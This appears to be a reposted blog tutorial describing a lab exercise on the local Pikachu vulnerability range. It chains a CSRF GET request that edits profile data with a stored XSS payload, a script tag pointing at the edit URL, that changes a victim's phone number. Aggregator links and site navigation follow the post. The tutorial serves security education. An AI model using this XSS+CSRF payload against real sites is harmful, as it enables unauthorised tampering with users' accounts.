[xss combined with csrf experiment]

Mobile 2023-07-15 23:02:58 views: null

Article directory

foreword
1. Experiment introduction
2. Experimental steps
Summarize

foreword

Usually xss vulnerability can be used in combination with csrf vulnerability, let’s do a small experiment example today

1. Experiment introduction

Vulnerabilities mainly exploit the non-exit status of users modifying sensitive information, and the modified information is easy to be forged without verification. When we find that there is a csrf vulnerability, we can construct url request information and cooperate with xss vulnerability to cooperate with induced access.

This experiment is demonstrated by the pikachu shooting range built locally.

2. Experimental steps

1. User login

insert image description here

2. Crawl information modified url

GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=11111111113&add=usa&email=lili%40pikachu.com&submit=submit

insert image description here

That is to say, as long as the url is submitted, the user information can be modified.

3. Construct xss statement

<script src='http://127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=11111111112&add=usa&email=lili%40pikachu.com&submit=submit'> </script>

The initial phone number is 11111111113, and the modified phone number is 11111111112

4. Insert xss statement

insert image description here

5. View user information has been modified

insert image description here

Summarize

This issue briefly introduces the combination of xss vulnerability and csrf vulnerability

Guess you like

Origin blog.csdn.net/qq_61872115/article/details/126745852

[xss combined with csrf experiment]

XSS, CSRF attacks and Prevention

csrf attacks xss difference

pikachu's xss and csrf

XSS and CSRF attack defense

XSS and CSRF vulnerabilities

Safety testing (xss \ csrf attack)

xss csrf http2.0

pikachu - (2) and for various XSS CSRF

CSRF and web security technology --XSS

Understanding of xss attacks and attacks csrf

django own security mechanisms -XSS and csrf-XSS attack django own security mechanisms -XSS and csrf

Web security and protection (XSS, CSRF, sql injection)

Front-end security CSRF and XSS

Front-end security (XSS, CSRF)

Storage xss stealing cookie experiment

Pikachu vulnerability exercise platform experiment --CSRF (c)

Closing days of the experiment --xss basis Defense Strategy

Web universal principle vulnerability --XML injection, XSS, CSRF vulnerabilities

Remember --------- HTTP front-end heart of XSS and CSRF attacks

XSS and CSRF - two common attack methods in the field of web security

保护你的网站免受CSRF和XSS攻击

Utilization of the trace method and some ideas on CSRF+XSS

Front-end security-XSS attack, CSRF attack

Introduction to basic web architecture and web attacks (SQL injection, XSS, CSRF)

Huawei router, switch VRRP combined with BFD technology configuration experiment

csrf

Front panel pagoda version 6.x stored XSS + CSRF backstage portfolio Getshell

CSRF / SSRF: Why did you avoid XSS or did you "send" a Weibo?

2. Web Security (xss/csrf) Simple Attack Principles and Defense Schemes (Actual Combat)

Recommended

NYSE technical issues send Berkshire Hathaway (BRK.A) down nearly 100%

Ranking

Why is BufferedReader read() much slower than readLine()?

postman Interface learning from entry to the master

Create function example

Bitmap compression strategy

Day05 common data type built-in method

統一されたセマンティック表現に基づくマルチユーザー異種セマンティックネットワーク

The "4+1" view of the system architect's architecture and the "4+1" view of UML

[User Tutorial] Migrating DGPals to Cronos Protocol

Summer training topics

Version 3.2.0 preview! Remote logs solve the problem of unable to obtain logs due to Worker failure

Daily

More

2024-06-03(1)

2024-06-02(0)

2024-06-01(1)

2024-05-31(1)

2024-05-30(0)

2024-05-29(1)

2024-05-28(1)

2024-05-27(1)

2024-05-26(0)

2024-05-25(3)